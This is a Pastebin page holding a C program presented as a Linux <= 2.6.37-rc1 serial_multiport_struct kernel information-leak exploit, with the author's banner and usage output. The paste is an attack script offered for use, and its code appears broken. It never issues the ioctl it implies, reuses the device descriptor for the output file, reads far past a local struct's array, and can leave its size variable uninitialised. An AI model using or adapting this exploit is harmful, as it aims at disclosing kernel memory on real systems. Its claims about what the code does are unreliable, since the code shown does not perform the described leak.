API tools faq
paste
Advertisement
fruffl

2.6.37rc1 Info Leak Exploit

fruffl
Nov 12th, 2011
218
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.11 KB | None | 0 0
raw download clone embed print report
  1. /* Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit
  2.  *
  3.  *  ./splitmilk2 leak 134514859
  4.  * [\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit
  5.  * [\m/] by Todor Donev
  6.  *  [x] Leakfile    : leak
  7.  *  [x] Reservedsize    : 134514859
  8.  * [+] Leaking.. =)
  9.  * ...
  10.  *
  11.  *
  12.  * Greets to prdelka,
  13.  * for splitmilk.c release, Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit
  14.  *
  15.  * Thanks to Tsvetelina Emirska,
  16.  * that support, respect and inspire me..
  17.  *
  18.  * Yes, I know thats lame, but I was so bored and lazy for better.
  19.  *
  20.  * Author: Todor Donev
  21.  * Author email: [todor.donev@gmail]
  22.  *
  23.  */
  24.  
  25. #include <stdio.h>
  26. #include <stdlib.h>
  27. #include <string.h>
  28. #include <fcntl.h>
  29. #include <termios.h>
  30. #include <linux/serial.h>
  31.  
  32. #define DEVICE "/dev/ttyS1"
  33.  
  34. int main(int argc, char* argv[]) {
  35.     int ret = 0;
  36.     int i, fd, reservedsize;
  37.     char* buf;
  38.     struct  serial_multiport_struct  buffer;
  39.     printf("[\\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit\n");
  40.     printf("[\\m/] by Todor Donev\n");
  41.     fd = open(DEVICE, O_RDONLY);
  42.     if (fd <0) {
  43.     printf("[-] Error: f0k\n");
  44.     exit(-1);
  45. }  
  46.     if (argc < 2) {
  47.         fprintf(stderr, "[!] usg: %s <leakfile> <reservedsize>\n", argv[0]);
  48.         exit(-1);
  49.     }
  50.     if (argc > 2)
  51.         if ((reservedsize = atoi(argv[2])) == 0) {
  52.             fprintf(stderr, " [-] Sorry: (atoi) invalid outsize\n");
  53.             exit(-1);
  54.         }
  55.     fprintf(stderr, "  [x] Leakfile: %s\n", argv[1]);
  56.     fprintf(stderr, "  [x] Reservedsize: %u\n", reservedsize);
  57.      if ((buf = (char *)malloc(reservedsize)) == NULL) {
  58.         perror("Sorry: (malloc)");
  59.         fprintf(stderr, " [-] Sorry: Try again with other output size\n");
  60.         exit(1);
  61.     }
  62.     memset(&buffer,0,sizeof(buffer));
  63.     printf("[+] Leaking.. =)\n");
  64.     if((fd = open(argv[1], O_RDWR | O_CREAT, 0640)) == -1){
  65.     printf("[-] Error: f0k =(\n");
  66.     exit(-1);
  67.     }
  68.     for(i=0;i<=reservedsize;i++){
  69.         ret += write(fd,&buffer.reserved[i],sizeof(int));
  70.     }
  71.     close(fd);
  72.     printf("\\o/ %d bytez\n",ret);
  73.     exit(0);
  74. }
  75.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!